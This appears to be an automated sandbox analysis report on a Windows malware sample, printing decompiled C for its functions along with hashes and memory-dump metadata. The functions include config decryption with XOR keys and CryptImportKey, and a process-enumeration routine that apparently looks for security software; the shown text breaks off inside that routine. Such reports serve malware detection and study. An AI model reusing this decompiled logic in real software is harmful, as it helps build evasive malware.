Source File: 00000003.00000002.473161048.0000000000E81000.00000020.00000001.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000003.00000002.473146636.0000000000E80000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.473203055.0000000000E89000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.473245144.0000000000E8A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.473271496.0000000000E8C000.00000002.00000001.sdmp Download File

Similarity

API ID: FreeString$lstrlenmemcpymemset
String ID:
API String ID: 397948122-0
Opcode ID: 1b371a68d12d2553072684dd163a5dbb1ff3b943d06ae4dfc81a4b6e8dea62c2
Instruction ID: d08b334a482a066a591c3502cc39294959eb4439400156d5267fa23987f8c9eb
Opcode Fuzzy Hash: 1b371a68d12d2553072684dd163a5dbb1ff3b943d06ae4dfc81a4b6e8dea62c2
Instruction Fuzzy Hash: D8017C7650042ABFDB12FFA8CC05DAEBBB8FB08754F001566F90DF60A1D3B09A659791

Uniqueness

Uniqueness Score: -1.00%

Function 6E200101, Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,?), ref: 6E200133

Memory Dump Source

Source File: 00000003.00000002.478879912.000000006E19E000.00000020.00020000.sdmp, Offset: 6E19E000, based on PE: false

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 90672d539c90a76b04045d5b9f460f897f79d12de13ce994603e872b0be107df
Instruction ID: 8219b189aaffa878fab854d9feca174640d1aaf472ea5e7ac7f12b1203f6c140
Opcode Fuzzy Hash: 90672d539c90a76b04045d5b9f460f897f79d12de13ce994603e872b0be107df
Instruction Fuzzy Hash: 78E0E53150061B97FB502EE98C04F96F69F9F027B2F080820DC18970C0FB60C802C5F1

Uniqueness

Uniqueness Score: -1.00%

Function 00E850CA, Relevance: 1.5, APIs: 1, Instructions: 5
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00E850CA(void* _a4) {
				char _t2;

				_t2 = RtlFreeHeap( *0xe8a290, 0, _a4); // executed
				return _t2;
			}

0x00e850d6
0x00e850dc

APIs

RtlFreeHeap.NTDLL(00000000,00000000,00E84239,00000000,00000001,?,00000000,?,?,?,00E86B8D,00000000,?,00000001), ref: 00E850D6

Memory Dump Source

Source File: 00000003.00000002.473161048.0000000000E81000.00000020.00000001.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000003.00000002.473146636.0000000000E80000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.473203055.0000000000E89000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.473245144.0000000000E8A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.473271496.0000000000E8C000.00000002.00000001.sdmp Download File

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 43347b378b8152c919bc25c65ba141e6fdf6d1ef290f3b3c843d1041e64c8bc9
Instruction ID: 11b58d8bc6a233bab832a5b3ea85c882cc2ddae6a29e0bd83aa1fea4e28798cf
Opcode Fuzzy Hash: 43347b378b8152c919bc25c65ba141e6fdf6d1ef290f3b3c843d1041e64c8bc9
Instruction Fuzzy Hash: 0DB01271504100EFDB324B02DE04F057B22B750B00F084421B30C2407082320424FB16

Uniqueness

Uniqueness Score: -1.00%

Function 00E86837, Relevance: 1.5, APIs: 1, Instructions: 5
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00E86837(long _a4) {
				void* _t2;

				_t2 = RtlAllocateHeap( *0xe8a290, 0, _a4); // executed
				return _t2;
			}

0x00e86843
0x00e86849

APIs

RtlAllocateHeap.NTDLL(00000000,00000000,00E84197), ref: 00E86843

Memory Dump Source

Source File: 00000003.00000002.473161048.0000000000E81000.00000020.00000001.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000003.00000002.473146636.0000000000E80000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.473203055.0000000000E89000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.473245144.0000000000E8A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.473271496.0000000000E8C000.00000002.00000001.sdmp Download File

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: cb3e7e027be8302f3f4ccc47d233f88610fc4da71d1166c5e2753f977865d97b
Instruction ID: d47ca189b1a7b52dd10cbf79eea33db69ce5afb5bd9850b5d873879b344c6987
Opcode Fuzzy Hash: cb3e7e027be8302f3f4ccc47d233f88610fc4da71d1166c5e2753f977865d97b
Instruction Fuzzy Hash: 53B01231414100AFDA224B41DD04F057B32B750B00F284421B20D2007082320424FB05

Uniqueness

Uniqueness Score: -1.00%

Function 00E82BE3, Relevance: 1.3, APIs: 1, Instructions: 99
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00E82BE3(intOrPtr* __eax, void* __ecx, void* __edx, void* _a4, void** _a8) {
				void* _v8;
				int _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v144;
				int _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				intOrPtr _v160;
				char _v164;
				void* _t37;
				void* _t42;
				void* _t51;
				int _t53;
				void* _t60;
				void* _t63;
				void* _t64;

				_t53 = 0;
				_t60 = __ecx;
				_v16 = 0;
				_v12 = 0;
				_v8 = 0;
				if(__ecx <= 0x80 ||  *__eax != 0x400) {
					L21:
					return _t53;
				} else {
					_t58 =  &_v164;
					_t37 = E00E856CF(__eax, __edx,  &_v164,  &_v16, _a4 + __ecx - 0x80);
					if(_t37 != 0) {
						goto L21;
					}
					_t61 = _t60 - 0x80;
					if(_v148 > _t60 - 0x80) {
						goto L21;
					}
					while( *((intOrPtr*)(_t64 + _t37 - 0x8c)) == _t53) {
						_t37 = _t37 + 1;
						if(_t37 < 0x10) {
							continue;
						}
						_t53 = _v148;
						_t51 = E00E86837(_t53);
						_t73 = _t51;
						_v8 = _t51;
						if(_t51 != 0) {
							_t53 = 0;
							L18:
							if(_t53 != 0) {
								goto L21;
							}
							L19:
							if(_v8 != 0) {
								E00E850CA(_v8);
							}
							goto L21;
						}
						memcpy(_t51, _a4, _t53);
						L8:
						_t63 = _v8;
						E00E83984(_t58, _t73, _t63, _t53,  &_v32);
						if(_v32 != _v164 || _v28 != _v160 || _v24 != _v156 || _v20 != _v152) {
							L15:
							_t53 = 0;
							goto L19;
						} else {
							 *_a8 = _t63;
							goto L18;
						}
					}
					_t58 =  &_v144;
					_t42 = E00E839C5(_t61 & 0xfffffff0, 0,  &_v144, _a4,  &_v8,  &_v12); // executed
					__eflags = _t42;
					if(_t42 != 0) {
						_t53 = _v12;
						goto L18;
					}
					_t53 = _v148;
					__eflags = _v12 - _t53;
					if(__eflags >= 0) {
						goto L8;
					}
					goto L15;
				}
			}

0x00e82bee
0x00e82bf1
0x00e82bfa
0x00e82bfd
0x00e82c00
0x00e82c03
0x00e82cff
0x00e82d03
0x00e82c15
0x00e82c21
0x00e82c28
0x00e82c2f
0x00000000
0x00000000
0x00e82c35
0x00e82c3d
0x00000000
0x00000000
0x00e82c43
0x00e82c4c
0x00e82c50
0x00000000
0x00000000
0x00e82c52
0x00e82c59
0x00e82c5e
0x00e82c60
0x00e82c63
0x00e82ce4
0x00e82ceb
0x00e82ced
0x00000000
0x00000000
0x00e82cef
0x00e82cf3
0x00e82cf8
0x00e82cf8
0x00000000
0x00e82cf3
0x00e82c6a
0x00e82c72
0x00e82c72
0x00e82c7b
0x00e82c89
0x00e82ce0
0x00e82ce0
0x00000000
0x00e82cac
0x00e82caf
0x00000000
0x00e82caf
0x00e82c89
0x00e82cbe
0x00e82ccc
0x00e82cd1
0x00e82cd3
0x00e82ce8
0x00000000
0x00e82ce8
0x00e82cd5
0x00e82cdb
0x00e82cde
0x00000000
0x00000000
0x00000000
0x00e82cde

APIs

memcpy.NTDLL(00000000,?,?,?,?,00E820FA,?,00E820FA,?,00E820FA), ref: 00E82C6A

Memory Dump Source

Source File: 00000003.00000002.473161048.0000000000E81000.00000020.00000001.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000003.00000002.473146636.0000000000E80000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.473203055.0000000000E89000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.473245144.0000000000E8A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.473271496.0000000000E8C000.00000002.00000001.sdmp Download File

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: b886c889b787119bcde1e23be31950f49dad5c5448809bc4e40c6d9cf0c01973
Instruction ID: 50bdfca5d0929a1e97fd0eb758fc047c3a4a46ee3d33bb8d3032ba3f45ea0538
Opcode Fuzzy Hash: b886c889b787119bcde1e23be31950f49dad5c5448809bc4e40c6d9cf0c01973
Instruction Fuzzy Hash: 1E311A75A00619AFDF21EEA4C880BBEF7B8BB14308F1050ADE61DB7151D6709E84DBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00E85384, Relevance: 1.3, APIs: 1, Instructions: 42
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00E85384(intOrPtr* __edi, void* _a4, void* _a8, unsigned int _a12) {
				void* _t24;
				signed short _t25;
				signed int _t27;
				intOrPtr* _t28;
				signed short _t29;

				_t28 = __edi;
				if(_a4 == 0) {
					L2:
					_t29 = E00E86A36(_a4, 0x80000002, _a8, _a12,  &_a4,  &_a12);
					if(_t29 == 0) {
						_t27 = _a12 >> 1;
						if(_t27 == 0) {
							_t29 = 2;
							HeapFree( *0xe8a290, 0, _a4);
						} else {
							_t24 = _a4;
							 *(_t24 + _t27 * 2 - 2) =  *(_t24 + _t27 * 2 - 2) & _t29;
							 *_t28 = _t24;
						}
					}
					L6:
					return _t29;
				}
				_t25 = E00E84576(_a4, _a8, _a12, __edi); // executed
				_t29 = _t25;
				if(_t29 == 0) {
					goto L6;
				}
				goto L2;
			}

0x00e85384
0x00e8538c
0x00e853a3
0x00e853be
0x00e853c2
0x00e853c7
0x00e853c9
0x00e853d9
0x00e853e5
0x00e853cb
0x00e853cb
0x00e853ce
0x00e853d3
0x00e853d3
0x00e853c9
0x00e853eb
0x00e853ef
0x00e853ef
0x00e85398
0x00e8539d
0x00e853a1
0x00000000
0x00000000
0x00000000

APIs

Part of subcall function 00E84576: SysFreeString.OLEAUT32(00000000), ref: 00E845DC

HeapFree.KERNEL32(00000000,00000000,00000000,80000002,74B5F710,?,00000000,?,00000000,?,00E81AF5,?,004F0053,05499308,00000000,?), ref: 00E853E5

Memory Dump Source

Source File: 00000003.00000002.473161048.0000000000E81000.00000020.00000001.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000003.00000002.473146636.0000000000E80000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.473203055.0000000000E89000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.473245144.0000000000E8A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.473271496.0000000000E8C000.00000002.00000001.sdmp Download File

Similarity

API ID: Free$HeapString
String ID:
API String ID: 3806048269-0
Opcode ID: 4bfb50c89a282966f27f730ea487bef39306e335749c6f823ce8dbcaee6b0554
Instruction ID: 7f35c462d19b6e7d87ead8f1000e6be6a0e3e5dd5f88191c3bf3225c6705cb8a
Opcode Fuzzy Hash: 4bfb50c89a282966f27f730ea487bef39306e335749c6f823ce8dbcaee6b0554
Instruction Fuzzy Hash: A1012433000A19BBCB22AF44CC41EEE7BA9FB14790F188029FE0D6A164DB71C920DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00E849FE, Relevance: 1.3, APIs: 1, Instructions: 36
stringCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E00E849FE(void* __ecx, void* __edx, void* _a4, void* _a8) {
				void* _t13;
				void* _t21;

				_t11 =  &_a4;
				_t21 = 0;
				__imp__( &_a8);
				_t13 = E00E839C5( &_a4 + 1, 1, _a8, _a4, _a4, _t11); // executed
				if(_t13 == 0) {
					_t21 = E00E86837(_a8 + _a8);
					if(_t21 != 0) {
						E00E82E61(_a4, _t21, _t23);
					}
					E00E850CA(_a4);
				}
				return _t21;
			}

0x00e84a06
0x00e84a0d
0x00e84a0f
0x00e84a1e
0x00e84a25
0x00e84a34
0x00e84a38
0x00e84a3f
0x00e84a3f
0x00e84a47
0x00e84a4c
0x00e84a51

APIs

lstrlen.KERNEL32(00000000,00000000,00E870D9,00000000,?,00E862B1,00000000,00E870D9,?,00000000,00E870D9,00000000,05499630), ref: 00E84A0F

Part of subcall function 00E839C5: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,00000000,00000000,00000000,?,?,?,00E84A23,00000001,00E870D9,00000000), ref: 00E839FD
Part of subcall function 00E839C5: memcpy.NTDLL(#J,00E870D9,00000010,?,?,?,00E84A23,00000001,00E870D9,00000000,?,00E862B1,00000000,00E870D9,?,00000000), ref: 00E83A16
Part of subcall function 00E839C5: CryptImportKey.ADVAPI32(?,?,0000001C,00000000,00000000,00000000), ref: 00E83A3F
Part of subcall function 00E839C5: CryptSetKeyParam.ADVAPI32(00000000,00000001,?,00000000), ref: 00E83A57
Part of subcall function 00E839C5: memcpy.NTDLL(00000000,00000000,05499630,00000010), ref: 00E83AA9

Part of subcall function 00E86837: RtlAllocateHeap.NTDLL(00000000,00000000,00E84197), ref: 00E86843

Memory Dump Source

Source File: 00000003.00000002.473161048.0000000000E81000.00000020.00000001.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000003.00000002.473146636.0000000000E80000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.473203055.0000000000E89000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.473245144.0000000000E8A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.473271496.0000000000E8C000.00000002.00000001.sdmp Download File

Similarity

API ID: Crypt$memcpy$AcquireAllocateContextHeapImportParamlstrlen
String ID:
API String ID: 894908221-0
Opcode ID: 59d88d1c29e28e364f36a6c2f94d2db03af3b2b544067c806cb80707da93cdd3
Instruction ID: 497eed4fda6d590dabe9a20cd479b8b8128492220702912acc2833e247990131
Opcode Fuzzy Hash: 59d88d1c29e28e364f36a6c2f94d2db03af3b2b544067c806cb80707da93cdd3
Instruction Fuzzy Hash: 6EF03A76100109BACF12BEA5DC00DEF3FADEF85764B008022FD0CAA111DA31DA55DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00E81FC2, Relevance: 1.3, APIs: 1, Instructions: 36
sleepCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E00E81FC2(intOrPtr* __edi) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				intOrPtr _t15;
				intOrPtr* _t21;

				_t21 = __edi;
				_push( &_v12);
				_push(__edi);
				_v8 = 0x1d4c0;
				_t15 =  *((intOrPtr*)( *__edi + 0xe0))();
				while(1) {
					_v16 = _t15;
					Sleep(0x1f4); // executed
					if(_v12 == 4) {
						break;
					}
					if(_v8 == 0) {
						L4:
						_t15 =  *((intOrPtr*)( *_t21 + 0xe0))(_t21,  &_v12);
						continue;
					} else {
						if(_v8 <= 0x1f4) {
							_v16 = 0x80004004;
						} else {
							_v8 = _v8 - 0x1f4;
							goto L4;
						}
					}
					L8:
					return _v16;
				}
				goto L8;
			}

0x00e81fc2
0x00e81fcf
0x00e81fd0
0x00e81fd1
0x00e81fd8
0x00e82006
0x00e82007
0x00e8200a
0x00e82010
0x00000000
0x00000000
0x00e81fef
0x00e81ff9
0x00e82000
0x00000000
0x00e81ff1
0x00e81ff4
0x00e82014
0x00e81ff6
0x00e81ff6
0x00000000
0x00e81ff6
0x00e81ff4
0x00e8201b
0x00e82021
0x00e82021
0x00000000

APIs

Sleep.KERNELBASE(000001F4), ref: 00E8200A

Memory Dump Source

Source File: 00000003.00000002.473161048.0000000000E81000.00000020.00000001.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000003.00000002.473146636.0000000000E80000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.473203055.0000000000E89000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.473245144.0000000000E8A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.473271496.0000000000E8C000.00000002.00000001.sdmp Download File

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 8fb914887058131a7b3ded4a488ced8a9bf0c0c8188deae7d67031faf30bc5eb
Instruction ID: 0b7cc5de3d1a12d55aafb66a6d7cf935c1877e7c26b12cb2c49dedabe315cef4
Opcode Fuzzy Hash: 8fb914887058131a7b3ded4a488ced8a9bf0c0c8188deae7d67031faf30bc5eb
Instruction Fuzzy Hash: F6F0EC75D01218EFDB00EBD4C488AEDB7B8FF04304F1450AAE60AB7241D7B45B84DB61

Uniqueness

Uniqueness Score: -1.00%

Function 00E81F7A, Relevance: 1.3, APIs: 1, Instructions: 26
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00E81F7A(intOrPtr _a4, intOrPtr _a8, void* _a12, intOrPtr _a16, WCHAR* _a20) {
				void* _t17;

				if(_a4 == 0) {
					L2:
					return E00E81A15(_a8, 1, _a12, _a16, _a20, lstrlenW(_a20) + _t14 + 2);
				}
				_t17 = E00E817B0(_a4, _a8, _a12, _a16, _a20); // executed
				if(_t17 != 0) {
					goto L2;
				}
				return _t17;
			}

0x00e81f82
0x00e81f9c
0x00000000
0x00e81fb8
0x00e81f93
0x00e81f9a
0x00000000
0x00000000
0x00e81fbf

APIs

lstrlenW.KERNEL32(?,?,?,00E81F20,3D00E890,80000002,00E830C2,00E84106,74666F53,4D4C4B48,00E84106,?,3D00E890,80000002,00E830C2,?), ref: 00E81F9F

Part of subcall function 00E817B0: SysAllocString.OLEAUT32(00E84106), ref: 00E817CA
Part of subcall function 00E817B0: SysFreeString.OLEAUT32(00000000), ref: 00E8180A

Memory Dump Source

Source File: 00000003.00000002.473161048.0000000000E81000.00000020.00000001.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000003.00000002.473146636.0000000000E80000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.473203055.0000000000E89000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.473245144.0000000000E8A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.473271496.0000000000E8C000.00000002.00000001.sdmp Download File

Similarity

API ID: String$AllocFreelstrlen
String ID:
API String ID: 3808004451-0
Opcode ID: 00bb49890e1732db7b78bd167dc7b8cee03109032a4d42ddaec409bb3d70fd6a
Instruction ID: 611ed97cffe69b9331f973b9261564754ff09452aeddba2b079d6cbf9af2ea83
Opcode Fuzzy Hash: 00bb49890e1732db7b78bd167dc7b8cee03109032a4d42ddaec409bb3d70fd6a
Instruction Fuzzy Hash: 3AF0923200420EBFDF06AF90DC06EAA3F6AAF08354F048055FA0864071D772D9B2EBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00E8738C, Relevance: 1.3, APIs: 1, Instructions: 23
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00E8738C(void* __edi, void* _a4) {
				int _t7;
				int _t12;

				_t7 = E00E8181D(__edi, _a4,  &_a4); // executed
				_t12 = _t7;
				if(_t12 != 0) {
					memcpy(__edi, _a4, _t12);
					 *((char*)(__edi + _t12)) = 0;
					E00E850CA(_a4);
				}
				return _t12;
			}

0x00e87398
0x00e8739d
0x00e873a1
0x00e873a8
0x00e873b3
0x00e873b7
0x00e873b7
0x00e873c0

APIs

Part of subcall function 00E8181D: memcpy.NTDLL(00000000,00000110,00E820FA,00E820FA,?,?,00E820FA,?,?,00E86042,?), ref: 00E81853
Part of subcall function 00E8181D: memset.NTDLL ref: 00E818C8
Part of subcall function 00E8181D: memset.NTDLL ref: 00E818DC

memcpy.NTDLL(00E820FA,00E820FA,00000000,00E820FA,00E820FA,00E820FA,?,?,00E86042,?,?,00E820FA,?), ref: 00E873A8

Part of subcall function 00E850CA: RtlFreeHeap.NTDLL(00000000,00000000,00E84239,00000000,00000001,?,00000000,?,?,?,00E86B8D,00000000,?,00000001), ref: 00E850D6

Memory Dump Source

Source File: 00000003.00000002.473161048.0000000000E81000.00000020.00000001.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000003.00000002.473146636.0000000000E80000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.473203055.0000000000E89000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.473245144.0000000000E8A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.473271496.0000000000E8C000.00000002.00000001.sdmp Download File

Similarity

API ID: memcpymemset$FreeHeap
String ID:
API String ID: 3053036209-0
Opcode ID: 0e6eeedcb255031fa5e404f471041d1cea96e9d7798315364b05c0ee56672632
Instruction ID: d2171e96576b6907208db43e3e236427062f10a499d9fd99a78daf144149b600
Opcode Fuzzy Hash: 0e6eeedcb255031fa5e404f471041d1cea96e9d7798315364b05c0ee56672632
Instruction Fuzzy Hash: 9AE0867340411876CB123A94DC01DEB7F9CCF41790F004015FD0C6A101D621D91097E1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00E82206, Relevance: 10.7, APIs: 7, Instructions: 204
memoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E00E82206(int* __ecx) {
				int _v8;
				void* _v12;
				void* _v16;
				void* __esi;
				signed int _t26;
				signed int _t31;
				signed int _t37;
				char* _t43;
				char* _t44;
				char* _t45;
				char* _t46;
				char* _t47;
				void* _t48;
				void* _t49;
				intOrPtr _t50;
				signed int _t56;
				void* _t58;
				void* _t59;
				signed int _t61;
				signed int _t65;
				signed int _t69;
				signed int _t73;
				signed int _t77;
				signed int _t81;
				void* _t86;
				intOrPtr _t102;

				_t87 = __ecx;
				_t26 =  *0xe8a2d0; // 0x63699bc3
				if(E00E81BCB( &_v8,  &_v12, _t26 ^ 0x8241c5a7) != 0 && _v12 >= 0x110) {
					 *0xe8a324 = _v8;
				}
				_t31 =  *0xe8a2d0; // 0x63699bc3
				if(E00E81BCB( &_v16,  &_v12, _t31 ^ 0x0b822240) == 0) {
					_v12 = 2;
					L50:
					return _v12;
				}
				_t37 =  *0xe8a2d0; // 0x63699bc3
				if(E00E81BCB( &_v12,  &_v8, _t37 ^ 0xecd84622) == 0) {
					L48:
					HeapFree( *0xe8a290, 0, _v16);
					goto L50;
				} else {
					_t86 = _v12;
					if(_t86 == 0) {
						_t43 = 0;
					} else {
						_t81 =  *0xe8a2d0; // 0x63699bc3
						_t43 = E00E838CE(_t87, _t86, _t81 ^ 0x724e87bc);
					}
					if(_t43 != 0) {
						_t87 =  &_v8;
						if(StrToIntExA(_t43, 0,  &_v8) != 0) {
							 *0xe8a298 = _v8;
						}
					}
					if(_t86 == 0) {
						_t44 = 0;
					} else {
						_t77 =  *0xe8a2d0; // 0x63699bc3
						_t44 = E00E838CE(_t87, _t86, _t77 ^ 0x2b40cc40);
					}
					if(_t44 != 0) {
						_t87 =  &_v8;
						if(StrToIntExA(_t44, 0,  &_v8) != 0) {
							 *0xe8a29c = _v8;
						}
					}
					if(_t86 == 0) {
						_t45 = 0;
					} else {
						_t73 =  *0xe8a2d0; // 0x63699bc3
						_t45 = E00E838CE(_t87, _t86, _t73 ^ 0x3b27c2e6);
					}
					if(_t45 != 0) {
						_t87 =  &_v8;
						if(StrToIntExA(_t45, 0,  &_v8) != 0) {
							 *0xe8a2a0 = _v8;
						}
					}
					if(_t86 == 0) {
						_t46 = 0;
					} else {
						_t69 =  *0xe8a2d0; // 0x63699bc3
						_t46 = E00E838CE(_t87, _t86, _t69 ^ 0x0602e249);
					}
					if(_t46 != 0) {
						_t87 =  &_v8;
						if(StrToIntExA(_t46, 0,  &_v8) != 0) {
							 *0xe8a004 = _v8;
						}
					}
					if(_t86 == 0) {
						_t47 = 0;
					} else {
						_t65 =  *0xe8a2d0; // 0x63699bc3
						_t47 = E00E838CE(_t87, _t86, _t65 ^ 0x3603764c);
					}
					if(_t47 != 0) {
						_t87 =  &_v8;
						if(StrToIntExA(_t47, 0,  &_v8) != 0) {
							 *0xe8a02c = _v8;
						}
					}
					if(_t86 == 0) {
						_t48 = 0;
					} else {
						_t61 =  *0xe8a2d0; // 0x63699bc3
						_t48 = E00E838CE(_t87, _t86, _t61 ^ 0x2cc1f2fd);
					}
					if(_t48 != 0) {
						_push(_t48);
						_t58 = 0x10;
						_t59 = E00E83E49(_t58);
						if(_t59 != 0) {
							_push(_t59);
							E00E850DF();
						}
					}
					if(_t86 == 0) {
						_t49 = 0;
					} else {
						_t56 =  *0xe8a2d0; // 0x63699bc3
						_t49 = E00E838CE(_t87, _t86, _t56 ^ 0xb30fc035);
					}
					if(_t49 != 0 && E00E83E49(0, _t49) != 0) {
						_t102 =  *0xe8a37c; // 0x5499630
						E00E810DD(_t102 + 4, _t54);
					}
					_t50 =  *0xe8a2d4; // 0x460d5a8
					_t20 = _t50 + 0xe8b252; // 0x54987fa
					_t21 = _t50 + 0xe8b7b5; // 0x6976612e
					 *0xe8a320 = _t20;
					 *0xe8a390 = _t21;
					HeapFree( *0xe8a290, 0, _t86);
					_v12 = 0;
					goto L48;
				}
			}

0x00e82206
0x00e82209
0x00e82229
0x00e82237
0x00e82237
0x00e8223c
0x00e82256
0x00e8242a
0x00e82431
0x00e82438
0x00e82438
0x00e8225c
0x00e82278
0x00e82418
0x00e82422
0x00000000
0x00e8227e
0x00e8227e
0x00e82283
0x00e82299
0x00e82285
0x00e82285
0x00e82292
0x00e82292
0x00e822a3
0x00e822a5
0x00e822af
0x00e822b4
0x00e822b4
0x00e822af
0x00e822bb
0x00e822d1
0x00e822bd
0x00e822bd
0x00e822ca
0x00e822ca
0x00e822d5
0x00e822d7
0x00e822e1
0x00e822e6
0x00e822e6
0x00e822e1
0x00e822ed
0x00e82303
0x00e822ef
0x00e822ef
0x00e822fc
0x00e822fc
0x00e82307
0x00e82309
0x00e82313
0x00e82318
0x00e82318
0x00e82313
0x00e8231f
0x00e82335
0x00e82321
0x00e82321
0x00e8232e
0x00e8232e
0x00e82339
0x00e8233b
0x00e82345
0x00e8234a
0x00e8234a
0x00e82345
0x00e82351
0x00e82367
0x00e82353
0x00e82353
0x00e82360
0x00e82360
0x00e8236b
0x00e8236d
0x00e82377
0x00e8237c
0x00e8237c
0x00e82377
0x00e82383
0x00e82399
0x00e82385
0x00e82385
0x00e82392
0x00e82392
0x00e8239d
0x00e8239f
0x00e823a2
0x00e823a3
0x00e823aa
0x00e823ac
0x00e823ad
0x00e823ad
0x00e823aa
0x00e823b4
0x00e823ca
0x00e823b6
0x00e823b6
0x00e823c3
0x00e823c3
0x00e823ce
0x00e823dc
0x00e823e6
0x00e823e6
0x00e823eb
0x00e823f1
0x00e823fe
0x00e82404
0x00e8240a
0x00e8240f
0x00e82415
0x00000000
0x00e82415

APIs

StrToIntExA.SHLWAPI(00000000,00000000,00E855D3,?,00E855D3,63699BC3,?,?,63699BC3,00E855D3,?,63699BC3,E8FA7DD7,00E8A00C,7742C740), ref: 00E822AB
StrToIntExA.SHLWAPI(00000000,00000000,00E855D3,?,00E855D3,63699BC3,?,?,63699BC3,00E855D3,?,63699BC3,E8FA7DD7,00E8A00C,7742C740), ref: 00E822DD
StrToIntExA.SHLWAPI(00000000,00000000,00E855D3,?,00E855D3,63699BC3,?,?,63699BC3,00E855D3,?,63699BC3,E8FA7DD7,00E8A00C,7742C740), ref: 00E8230F
StrToIntExA.SHLWAPI(00000000,00000000,00E855D3,?,00E855D3,63699BC3,?,?,63699BC3,00E855D3,?,63699BC3,E8FA7DD7,00E8A00C,7742C740), ref: 00E82341
StrToIntExA.SHLWAPI(00000000,00000000,00E855D3,?,00E855D3,63699BC3,?,?,63699BC3,00E855D3,?,63699BC3,E8FA7DD7,00E8A00C,7742C740), ref: 00E82373
HeapFree.KERNEL32(00000000,?,?,00E855D3,63699BC3,?,?,63699BC3,00E855D3,?,63699BC3,E8FA7DD7,00E8A00C,7742C740), ref: 00E8240F
HeapFree.KERNEL32(00000000,?,?,00E855D3,63699BC3,?,?,63699BC3,00E855D3,?,63699BC3,E8FA7DD7,00E8A00C,7742C740), ref: 00E82422

Memory Dump Source

Source File: 00000003.00000002.473161048.0000000000E81000.00000020.00000001.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000003.00000002.473146636.0000000000E80000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.473203055.0000000000E89000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.473245144.0000000000E8A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.473271496.0000000000E8C000.00000002.00000001.sdmp Download File

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: d2688c4a9a30e376edd805ceb87239bf1f152dacdb939c4112dc23f49772c9a7
Instruction ID: b6ad55aa0a905a7685880cdc44a93998b68d01696398e27d96ac1d248af23ff1
Opcode Fuzzy Hash: d2688c4a9a30e376edd805ceb87239bf1f152dacdb939c4112dc23f49772c9a7
Instruction Fuzzy Hash: AD61C770A00105EFD721FBB6DC88C9F77EDAB48704B28192AB60DF3161EA35DE459B21

Uniqueness

Uniqueness Score: -1.00%

Function 00E8513E, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41
processCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00E8513E() {
				char _v264;
				void* _v300;
				int _t8;
				intOrPtr _t9;
				int _t15;
				void* _t17;

				_t15 = 0;
				_t17 = CreateToolhelp32Snapshot(2, 0);
				if(_t17 != 0) {
					_t8 = Process32First(_t17,  &_v300);
					while(_t8 != 0) {
						_t9 =  *0xe8a2d4; // 0x460d5a8
						_t2 = _t9 + 0xe8bdd4; // 0x73617661
						_push( &_v264);
						if( *0xe8a118() != 0) {
							_t15 = 1;
						} else {
							_t8 = Process32Next(_t17,  &_v300);
							continue;
						}
